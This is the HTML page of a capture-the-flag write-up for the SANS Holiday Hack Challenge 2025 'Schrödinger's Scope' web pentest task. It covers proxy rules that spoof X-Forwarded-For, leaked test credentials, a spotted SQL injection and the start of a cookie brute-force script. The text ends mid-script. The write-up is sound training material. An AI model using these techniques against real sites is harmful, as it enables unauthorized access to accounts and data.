<!DOCTYPE html>
<html lang="en-us" dir="ltr" itemscope itemtype="http://schema.org/Article" data-r-output-format="html">
  <head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
    <meta charset="utf-8">
    <meta name="viewport" content="height=device-height, width=device-width, initial-scale=1.0, minimum-scale=1.0">
    <meta name="generator" content="Hugo 0.152.2">
    <meta name="generator" content="Relearn 8.2.0+926ba4d1230e27319cf62da0633eb3420e6af1bf">
    <meta name="description" content="Objective Difficulty Description 3/5 Kevin in the Retro Store ponders pentest paradoxes—can you solve Schrödinger’s Scope? Kevin McFarland mission statement The Neighborhood College Course Registration System has been getting some updates lately and I’m wondering if you might help me improve its security by performing a small web application penetration test of the site.
For any web application test, one of the most important things for the test is the ‘scope’, that is, what one is permitted to test and what one should not. While hacking is fun and cool, professional integrity means respecting scope boundaries, especially when there are tempting targets outside our permitted scope.">
    <meta name="author" content="">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Schrödingers Scope :: SANS Holiday Hack Challenge 2025">
    <meta name="twitter:description" content="Objective Difficulty Description 3/5 Kevin in the Retro Store ponders pentest paradoxes—can you solve Schrödinger’s Scope? Kevin McFarland mission statement The Neighborhood College Course Registration System has been getting some updates lately and I’m wondering if you might help me improve its security by performing a small web application penetration test of the site.
For any web application test, one of the most important things for the test is the ‘scope’, that is, what one is permitted to test and what one should not. While hacking is fun and cool, professional integrity means respecting scope boundaries, especially when there are tempting targets outside our permitted scope.">
    <meta property="og:url" content="http://localhost:1313/act3/schrodingers-scope/index.html">
    <meta property="og:site_name" content="SANS Holiday Hack Challenge 2025">
    <meta property="og:title" content="Schrödingers Scope :: SANS Holiday Hack Challenge 2025">
    <meta property="og:description" content="Objective Difficulty Description 3/5 Kevin in the Retro Store ponders pentest paradoxes—can you solve Schrödinger’s Scope? Kevin McFarland mission statement The Neighborhood College Course Registration System has been getting some updates lately and I’m wondering if you might help me improve its security by performing a small web application penetration test of the site.
For any web application test, one of the most important things for the test is the ‘scope’, that is, what one is permitted to test and what one should not. While hacking is fun and cool, professional integrity means respecting scope boundaries, especially when there are tempting targets outside our permitted scope.">
    <meta property="og:locale" content="en_us">
    <meta property="og:type" content="website">
    <meta itemprop="name" content="Schrödingers Scope :: SANS Holiday Hack Challenge 2025">
    <meta itemprop="description" content="Objective Difficulty Description 3/5 Kevin in the Retro Store ponders pentest paradoxes—can you solve Schrödinger’s Scope? Kevin McFarland mission statement The Neighborhood College Course Registration System has been getting some updates lately and I’m wondering if you might help me improve its security by performing a small web application penetration test of the site.
For any web application test, one of the most important things for the test is the ‘scope’, that is, what one is permitted to test and what one should not. While hacking is fun and cool, professional integrity means respecting scope boundaries, especially when there are tempting targets outside our permitted scope.">
    <meta itemprop="datePublished" content="2025-12-23T15:59:59+01:00">
    <meta itemprop="dateModified" content="2025-12-23T15:59:59+01:00">
    <meta itemprop="wordCount" content="1539">
    <title>Schrödingers Scope :: SANS Holiday Hack Challenge 2025</title>
    <link href="/act3/schrodingers-scope/index.xml" rel="alternate" type="application/rss+xml" title="Schrödingers Scope :: SANS Holiday Hack Challenge 2025">
    <link href="/fonts/fontawesome/css/fontawesome-all.min.css?1767538340" rel="stylesheet" media="print" onload="this.media='all';this.onload=null;"><noscript><link href="/fonts/fontawesome/css/fontawesome-all.min.css?1767538340" rel="stylesheet"></noscript>
    <link href="/css/perfect-scrollbar/perfect-scrollbar.min.css?1767538340" rel="stylesheet">
    <link href="/css/theme.css?1767538340" rel="stylesheet">
    <link href="/css/format-html.css?1767538340" rel="stylesheet" id="R-format-style">
    <script>
      window.relearn = window.relearn || {};
      // configuration
      window.relearn.min = ``;
      window.relearn.path='\/act3\/schrodingers-scope\/index.html';
      window.relearn.relBasePath='..\/..';
      window.relearn.relBaseUri='..\/..';
      window.relearn.absBaseUri='http:\/\/localhost:1313';
      window.relearn.disableAnchorCopy=false;
      window.relearn.disableAnchorScrolling=false;
      window.relearn.disableInlineCopyToClipboard=false;
      window.relearn.enableBlockCodeWrap=true;
      // legal
      window.relearn.getItem = (s,n) => {return s.getItem(n)};
      window.relearn.setItem = (s,n,v) => {return s.setItem(n,v)};
      window.relearn.removeItem = (s,n) => {return s.removeItem(n)};
      // translations
      window.T_Copy_to_clipboard = `Copy to clipboard`;
      window.T_Copied_to_clipboard = `Copied to clipboard!`;
      window.T_Copy_link_to_clipboard = `Copy link to clipboard`;
      window.T_Link_copied_to_clipboard = `Copied link to clipboard!`;
      window.T_Reset_view = `Reset view`;
      window.T_View_reset = `View reset!`;
      window.T_No_results_found = `No results found for "{0}"`;
      window.T_N_results_found = `{1} results found for "{0}"`;
      // variant stuff
      window.relearn.themevariants = [ 'hhc-2025' ];
      window.relearn.customvariantname = "my-custom-variant";
      window.relearn.changeVariant = function(variant) {
        var oldVariant = document.documentElement.dataset.rThemeVariant;
        window.relearn.setItem(window.localStorage, window.relearn.absBaseUri + "/variant", variant);
        document.documentElement.dataset.rThemeVariant = variant;
        if (oldVariant != variant) {
          document.dispatchEvent( new CustomEvent('themeVariantLoaded', { detail: { variant, oldVariant } }) );
          window.relearn.markVariant();
        }
      }
      window.relearn.markVariant = function() {
        var variant = window.relearn.getItem(window.localStorage, window.relearn.absBaseUri + "/variant");
        document.querySelectorAll(".R-variantswitcher select").forEach((select) => {select.value = variant;});
      }
      window.relearn.initVariant = function() {
        var variant = window.relearn.getItem(window.localStorage, window.relearn.absBaseUri + "/variant") ?? "";
        if( variant == window.relearn.customvariantname ){
        }else if( !variant || !window.relearn.themevariants.includes(variant) ){
          variant = window.relearn.themevariants[0];
          window.relearn.setItem(window.localStorage, window.relearn.absBaseUri + "/variant", variant);
        }
        document.documentElement.dataset.rThemeVariant = variant;
      }
      window.relearn.initVariant();
      window.relearn.markVariant();
    </script>
  </head>
  <body class="mobile-support html" data-url="/act3/schrodingers-scope/index.html">
    <div id="R-body" class="default-animation">
      <div id="R-body-overlay"></div>
      <nav id="R-topbar">
        <div class="topbar-wrapper">
          <div class="topbar-sidebar-divider"></div>
          <div class="topbar-area topbar-area-start" data-area="start">
            <div class="topbar-button topbar-button-sidebar" data-content-empty="disable" data-width-s="show" data-width-m="hide" data-width-l="hide">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleNav()" type="button" title="Menu (CTRL&#43;ALT&#43;n)"><i class="fa-fw fas fa-bars"></i></button></span>
            </div>
            <div class="topbar-button topbar-button-toc" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="Table of Contents (CTRL&#43;ALT&#43;t)"><i class="fa-fw fas fa-list-alt"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
<nav class="TableOfContents">
  <ul>
    <li><a href="#objective">Objective</a></li>
    <li><a href="#kevin-mcfarland-mission-statement">Kevin McFarland mission statement</a></li>
    <li><a href="#solution">Solution</a>
      <ul>
        <li><a href="#getting-rid-of-the-vandaling-gnome">Getting rid of the vandaling Gnome</a></li>
        <li><a href="#uncovered-developer-information-disclosure">Uncovered developer information disclosure.</a></li>
        <li><a href="#exploited-information-disclosure-via-login">Exploited Information Disclosure via login</a></li>
        <li><a href="#found-commented-out-course-search">Found commented-out course search</a></li>
        <li><a href="#identified-sql-injection-vulnerability">Identified SQL injection vulnerability</a></li>
        <li><a href="#reported-the-unauthorized-gnome-course">Reported the unauthorized gnome course</a></li>
        <li></li>
      </ul>
    </li>
    <li><a href="#kevin-mcfarland-closing-words">Kevin McFarland closing words</a></li>
    <li><a href="#hints">Hints</a></li>
  </ul>
</nav>
                </div>
              </div>
            </div>
          </div>
          <ol class="topbar-breadcrumbs breadcrumbs highlightable" itemscope itemtype="http://schema.org/BreadcrumbList"><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/index.html"><span itemprop="name">Sans Holiday Hack Challenge 2025 - Introduction</span></a><meta itemprop="position" content="1">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><a itemprop="item" href="/act3/index.html"><span itemprop="name">Act 3</span></a><meta itemprop="position" content="2">&nbsp;>&nbsp;</li><li itemscope itemtype="https://schema.org/ListItem" itemprop="itemListElement" class=""><span itemprop="name">Schrödingers Scope</span><meta itemprop="position" content="3"></li>
          </ol>
          <div class="topbar-area topbar-area-end" data-area="end">
            <div class="topbar-button topbar-button-prev" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><a href="/act3/snowcat-rce-and-priv-esc/index.html" title="Snowcat RCE & Priv Esc (🡐)"><i class="fa-fw fas fa-chevron-left"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-next" data-content-empty="disable" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><a href="/act3/find-and-shutdown-frostys-snowglobe-machine/index.html" title="Find and Shutdown Frostys Snowglobe Machine (🡒)"><i class="fa-fw fas fa-chevron-right"></i></a></span>
            </div>
            <div class="topbar-button topbar-button-more" data-content-empty="hide" data-width-s="show" data-width-m="show" data-width-l="show">
<span class="btn cstyle link noborder notitle interactive"><button onclick="toggleTopbarFlyout(this)" type="button" title="More"><i class="fa-fw fas fa-ellipsis-v"></i></button></span>
              <div class="topbar-content">
                <div class="topbar-content-wrapper">
                  <div class="topbar-area topbar-area-more" data-area="more">
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </nav>
      <div id="R-main-overlay"></div>
      <main id="R-body-inner" class="highlightable act3" tabindex="-1">
        <div class="flex-block-wrapper">
<article class="default">
  <header class="headline">
  </header>

<h1 id="schrödingers-scope">Schrödingers Scope</h1>

<p><a href="#R-image-f9700dfdf78b477b9973ae7df144616d" class="lightbox-link"><img alt="Kevin McFarland" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/kevinmcfarland-avatar.gif" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-f9700dfdf78b477b9973ae7df144616d"><img alt="Kevin McFarland" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/kevinmcfarland-avatar.gif"></a></p>
<h2 id="objective">Objective</h2>
<table>
  <thead>
      <tr>
          <th>Difficulty</th>
          <th>Description</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>3/5</td>
          <td>Kevin in the Retro Store ponders pentest paradoxes—can you solve Schrödinger&rsquo;s Scope?</td>
      </tr>
  </tbody>
</table>
<h2 id="kevin-mcfarland-mission-statement">Kevin McFarland mission statement</h2>
<blockquote>
<p>The Neighborhood College Course Registration System has been getting some updates lately and I&rsquo;m wondering if you might help me improve its security by performing a small web application penetration test of the site.</p>
<p>For any web application test, one of the most important things for the test is the &lsquo;scope&rsquo;, that is, what one is permitted to test and what one should not. While hacking is fun and cool, professional integrity means respecting scope boundaries, especially when there are tempting targets outside our permitted scope.</p>
<p>Thankfully, the Neighborhood College has provided a very concise set of &lsquo;Instructions&rsquo; which are accessible via a link provided on the site you will be testing. Do not overlook or dismiss the instructions! Following them is key to successfully completing the test.</p>
<p>Unfortunately, those pesky gnomes have found their way into the site and have been causing some mischief as well. Be wary of their presence and anything they may have to say as you are testing.</p>
<p>Can you help me demonstrate to the Neighborhood College that we know what responsible penetration testing looks like?</p>
<p>An eternal winter might sound poetic, but there&rsquo;s a reason Tolkien&rsquo;s heroes fought against endless darkness. A neighborhood frozen in time isn&rsquo;t preservation—it&rsquo;s stagnation. No spring astronomy observations, no summer shortwave propagation&hellip; just ice.</p>
</blockquote>
<h2 id="solution">Solution</h2>
<p>This objective emphasizes the importance of respecting scope during a web application penetration test. By following the provided instructions and constraints, I had to distinguish clearly between permitted and out-of-scope targets while still identifying meaningful security weaknesses. The challenge illustrates how overlooking scope guidance can lead to false positives, wasted effort, or ethical missteps, reinforcing that disciplined methodology is as important as technical skill in real-world testing.</p>
<p>This objective is available on this url: <a href="https://flask-schrodingers-scope-firestore.holidayhackchallenge.com" rel="external">https://flask-schrodingers-scope-firestore.holidayhackchallenge.com</a>. Upon entering it I were presented with a Rules of Engagement (RoE) notice:</p>
<p><a href="#R-image-d05cb55a660c02595dead9f3b63ab277" class="lightbox-link"><img alt="Rules of engagement" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-1.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-d05cb55a660c02595dead9f3b63ab277"><img alt="Rules of engagement" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-1.png"></a></p>
<p>After closing the RoE I was presented with this landing page:</p>
<p><a href="#R-image-3c791c4442931018f88ceccb6ffd3438" class="lightbox-link"><img alt="Landing page" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-2.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-3c791c4442931018f88ceccb6ffd3438"><img alt="Landing page" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-2.png"></a></p>
<p>Clicking on the &ldquo;Enter Registration System&rdquo; I was lead to this page:</p>
<p><a href="#R-image-3e53925896c5a09b95f21cf71613cc67" class="lightbox-link"><img alt="Student login" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-3.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-3e53925896c5a09b95f21cf71613cc67"><img alt="Student login" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-3.png"></a></p>
<p>As I were looking around the site I kept a close eye on the <em>/status_report</em> endpoint, even if I kept myself to <em>/register</em> I ended up with violations no matter what I did. Also, I noticed that there was a small gnome hiding in the bottom left corner when I looked over my screenshots.</p>
<p><a href="#R-image-7cf43f4740385fc3653ce4dd41830658" class="lightbox-link"><img alt="Violations" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-4.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-7cf43f4740385fc3653ce4dd41830658"><img alt="Violations" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-4.png"></a></p>
<h3 id="getting-rid-of-the-vandaling-gnome">Getting rid of the vandaling Gnome</h3>
<p>Reading up on the hints I was told to watch out for tiny, pesky gnomes who may be violating my progess. That gnome in the left bottom corner seemed to fit the bill. I then started to backtrack and reading up on the HTML source, and soon I found something interesting:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span><span style="color:#f92672">&lt;</span><span style="color:#a6e22e">script</span><span style="color:#f92672">&gt;</span>
</span></span><span style="display:flex;"><span>(<span style="color:#66d9ef">function</span>() {
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (window.<span style="color:#a6e22e">gnomeVandalLoaded</span>) <span style="color:#66d9ef">return</span>;
</span></span><span style="display:flex;"><span>    window.<span style="color:#a6e22e">gnomeVandalLoaded</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>;
</span></span><span style="display:flex;"><span>    
</span></span><span style="display:flex;"><span>    document.<span style="color:#a6e22e">addEventListener</span>(<span style="color:#e6db74">&#39;DOMContentLoaded&#39;</span>, <span style="color:#66d9ef">function</span>() {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">getCookie</span>(<span style="color:#a6e22e">name</span>) {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">var</span> <span style="color:#a6e22e">value</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;; &#34;</span> <span style="color:#f92672">+</span> document.<span style="color:#a6e22e">cookie</span>;
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">var</span> <span style="color:#a6e22e">parts</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">value</span>.<span style="color:#a6e22e">split</span>(<span style="color:#e6db74">&#34;; &#34;</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">name</span> <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;=&#34;</span>);
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">parts</span>.<span style="color:#a6e22e">length</span> <span style="color:#f92672">==</span> <span style="color:#ae81ff">2</span>) <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">parts</span>.<span style="color:#a6e22e">pop</span>().<span style="color:#a6e22e">split</span>(<span style="color:#e6db74">&#34;;&#34;</span>).<span style="color:#a6e22e">shift</span>();
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">getCookie</span>(<span style="color:#e6db74">&#39;Schrodinger&#39;</span>)) {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">var</span> <span style="color:#a6e22e">container</span> <span style="color:#f92672">=</span> document.<span style="color:#a6e22e">querySelector</span>(<span style="color:#e6db74">&#39;.mini-gnome-container&#39;</span>);
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">container</span> <span style="color:#f92672">&amp;&amp;</span> <span style="color:#f92672">!</span>document.<span style="color:#a6e22e">getElementById</span>(<span style="color:#e6db74">&#39;mini-gnome&#39;</span>)) {
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">var</span> <span style="color:#a6e22e">img</span> <span style="color:#f92672">=</span> document.<span style="color:#a6e22e">createElement</span>(<span style="color:#e6db74">&#39;img&#39;</span>);
</span></span><span style="display:flex;"><span>                <span style="color:#a6e22e">img</span>.<span style="color:#a6e22e">src</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;/gnomeU?id=b137f07d-7fd1-4537-8583-5ecd116a23f3&#39;</span>;
</span></span><span style="display:flex;"><span>                <span style="color:#a6e22e">img</span>.<span style="color:#a6e22e">id</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;mini-gnome&#39;</span>;
</span></span><span style="display:flex;"><span>                <span style="color:#a6e22e">img</span>.<span style="color:#a6e22e">style</span>.<span style="color:#a6e22e">cssText</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;width: 20px;height: auto;position: fixed; left: 10px; bottom: 10px;&#39;</span>;
</span></span><span style="display:flex;"><span>                <span style="color:#a6e22e">container</span>.<span style="color:#a6e22e">appendChild</span>(<span style="color:#a6e22e">img</span>);
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    });
</span></span><span style="display:flex;"><span>})();</span></span></code></pre></div>
<p>This script seems available on all pagens and runs once per page load and checks whether a cookie named Schrodinger is present in the browser. If the cookie exists, the script dynamically injects a small image element into the page: a &ldquo;mini gnome&rdquo; anchored to the bottom-left corner of the viewport. A global guard (window.gnomeVandalLoaded) ensures the script does not execute more than once, even if the page logic attempts to load it repeatedly. In practice, this means that simply having the Schrodinger cookie set is enough to trigger the gnome’s appearance, regardless of which endpoint I was actively interacting with. I figured out this piece of code was responsible for the violations by adding a <em>HTTP match and replace rules</em> rule tem to BurpSuite Proxy:</p>
<p>A simple rule set on the response body seemed to do the trick:</p>
<table>
  <thead>
      <tr>
          <th>Type</th>
          <th>Match</th>
          <th>Replace</th>
          <th>Where</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Response body</td>
          <td><code>img\.src\s=\s'\/gnomeU\?</code></td>
          <td><code>img.src = '/b0rk?</code></td>
          <td>To get rid of Gnome</td>
      </tr>
      <tr>
          <td>Request header</td>
          <td><code>Priority: u=0, i</code></td>
          <td><code>X-Forwarded-For: 127.0.0.1</code></td>
          <td>Invalid Forwarding IP</td>
      </tr>
  </tbody>
</table>
<p>By blocking the image source the violations seemed gone!</p>
<h3 id="uncovered-developer-information-disclosure">Uncovered developer information disclosure.</h3>
<p>Along the way one of the gnomes provides us with a sitemap. The list is quite long and I tried to see if any of the pages were reachable from the <em>/register</em> path:</p>
<table>
  <thead>
      <tr>
          <th>URL</th>
          <th>Mapped URL</th>
          <th>Comment</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>flask-schrodingers-scope-firestore.holidayhackchallenge.com/register</td>
          <td></td>
          <td>No response received</td>
      </tr>
      <tr>
          <td>flask-schrodingers-scope-firestore.holidayhackchallenge.com/register/login</td>
          <td></td>
          <td>Reachable</td>
      </tr>
      <tr>
          <td>flask-schrodingers-scope-firestore.holidayhackchallenge.com/register/reset</td>
          <td></td>
          <td>Reachable</td>
      </tr>
      <tr>
          <td>flask-schrodingers-scope-firestore.holidayhackchallenge.com/register/sitemap</td>
          <td></td>
          <td>Reachable</td>
      </tr>
      <tr>
          <td>flask-schrodingers-scope-firestore.holidayhackchallenge.com/register/status_report</td>
          <td></td>
          <td>Reachable</td>
      </tr>
      <tr>
          <td>flask-schrodingers-scope-firestore.holidayhackchallenge.com/wip/register/dev/dev_notes</td>
          <td>/register/dev/dev_notes</td>
          <td>HTTP 403 error</td>
      </tr>
      <tr>
          <td>flask-schrodingers-scope-firestore.holidayhackchallenge.com/wip/register/dev/dev_todos</td>
          <td>/register/dev/dev_todos</td>
          <td>Reachable page with vulnerability</td>
      </tr>
  </tbody>
</table>
<p>Path <em>/register/dev/dev_todos</em> contains <em>Uncovered developer information disclosure</em>:</p>
<p><a href="#R-image-061cdcc46f17fea73799f2a495c0505b" class="lightbox-link"><img alt="Uncovered developer information disclosure." class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-5.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-061cdcc46f17fea73799f2a495c0505b"><img alt="Uncovered developer information disclosure." class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-5.png"></a></p>
<h3 id="exploited-information-disclosure-via-login">Exploited Information Disclosure via login</h3>
<p>Logged in using the credentials I just found: <code>teststudent:2025h0L1d4y5</code></p>
<p><a href="#R-image-48bfbe3d5b5da8c8465a570bbde71ca4" class="lightbox-link"><img alt="Logging in as test student." class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-6.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-48bfbe3d5b5da8c8465a570bbde71ca4"><img alt="Logging in as test student." class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-6.png"></a></p>
<h3 id="found-commented-out-course-search">Found commented-out course search</h3>
<p>By inspecting the HTML source code I found an interesting comment mentioning a new endpoint:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">section</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;courses-content&#34;</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;courses-container&#34;</span> <span style="color:#a6e22e">style</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;max-width: 500px;&#34;</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;<span style="color:#f92672">h2</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;semester-heading&#34;</span>&gt;❄️ Spring Semester 2026 ❄️&lt;/<span style="color:#f92672">h2</span>&gt;
</span></span><span style="display:flex;"><span>        <span style="color:#75715e">&lt;!-- Should provide course listing here eventually instead of the extra step through search flow. --&gt;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e">&lt;!-- &lt;ul id=&#34;courseSearch&#34; class=&#34;courses-list&#34;&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">            &lt;li&gt;&lt;a href=&#34;/register/courses/search?id=1da0186b-4709-4edc-80be-fe43675c480d&#34;&gt;Course Search&lt;/a&gt;&lt;/li&gt;
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">        &lt;/ul&gt; --&gt;</span>
</span></span><span style="display:flex;"><span>    &lt;/<span style="color:#f92672">div</span>&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">section</span>&gt;</span></span></code></pre></div>
<p>By removing the comment and thus enabling the list, we got:</p>
<p><a href="#R-image-5f7eb7d71ab2148e327834567b505af8" class="lightbox-link"><img alt="Enabled course search" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-7.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-5f7eb7d71ab2148e327834567b505af8"><img alt="Enabled course search" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-7.png"></a></p>
<h3 id="identified-sql-injection-vulnerability">Identified SQL injection vulnerability</h3>
<p>By visting the link we just enabled I was presented with a search interface to search for courses. After toying with the query input, I figured out that this was SQL Injection all day long:</p>
<p><a href="#R-image-992e6244a7839fa4fd3be0c8ecbf4240" class="lightbox-link"><img alt="SQL Injection" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-8.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-992e6244a7839fa4fd3be0c8ecbf4240"><img alt="SQL Injection" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-8.png"></a></p>
<h3 id="reported-the-unauthorized-gnome-course">Reported the unauthorized gnome course</h3>
<p>At the end of the course list there&rsquo;s an entry named <em>&ldquo;GNOME 827 - Mischief Management&rdquo;</em> - clicking on that link lead me to:</p>
<p><a href="#R-image-ef5852636723590f6094c662d6f7870e" class="lightbox-link"><img alt="Report In-Scope vulnerability" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-9.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-ef5852636723590f6094c662d6f7870e"><img alt="Report In-Scope vulnerability" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-9.png"></a></p>
<p>The popup offers three options:</p>
<ul>
<li>Report</li>
<li>Remove Course</li>
<li>Continue</li>
</ul>
<p>At the same time it urges for me to report the vulnerability. And so I did.</p>
<h3></h3>
<p>Early in the game I found an endpoint, <em>/register/dev/dev_notes</em>, that gave me an <em>HTTP 403</em> error. I decided it was time to revisit it to see if I now had access since I was logged in with the <em>testuser</em> account. And so I had:</p>
<p><a href="#R-image-81366a505a76535011870dbb753b49fe" class="lightbox-link"><img alt="I have access now" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-10.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-81366a505a76535011870dbb753b49fe"><img alt="I have access now" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-10.png"></a></p>
<p>From the looks of it I am to look for the <em>holiday behavor</em> class, but it is <em>wip</em> state. By looking back at the other classes for inspiration, I decided to just add <em>wip</em> and specify the new class I was looking for in the url:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>/register/courses/wip/holiday_behavior</span></span></code></pre></div>
<p>This brought me to another 403 error screen:</p>
<p><a href="#R-image-bb6fface40bc658f0d6d4cfef993460f" class="lightbox-link"><img alt="Another 403 error screen" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-11.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-bb6fface40bc658f0d6d4cfef993460f"><img alt="Another 403 error screen" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-11.png"></a></p>
<p>It complained about invalid session registration value, so I took a look at the cookies:</p>
<p><a href="#R-image-92df77e5e383d6181cee9eb814fb89b6" class="lightbox-link"><img alt="Cookies" class="lazy lightbox figure-image" loading="lazy" src="/images/act3/act3-schrodinger-12.png" style="height: auto;width: auto;"></a>
<a href="javascript:history.back();" class="lightbox-back" id="R-image-92df77e5e383d6181cee9eb814fb89b6"><img alt="Cookies" class="lazy lightbox lightbox-image" loading="lazy" src="/images/act3/act3-schrodinger-12.png"></a></p>
<p>Interesting. The registration cookie contains a HEX, upon refreshing the pages multiple times I figures out this HEX code is not random as could be. I hacked together å Python script to find an assortion of HEX codes to see if it was a pattern somewhere. It was. Each HEX was prefixed with <code>eb72a05369dcb4</code>, and there were only 20 values or so in use. I then extended my Python script to calculate the full range of the last to HEX values, and then bruteforce my way in. The script ended up looking like this:</p>
<div class="highlight wrap-code" dir="auto"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> requests
</span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> pprint <span style="color:#f92672">import</span> pprint
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>schrodinger_token <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;e5e15381-843b-43fb-90d7-8b9eacc6c00b&#34;</span>
</span></span><span style="display:flex;"><span>get_param_id <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;4ed10eeb-35ae-4f83-91b3-3e0c90969799&#34;</span>
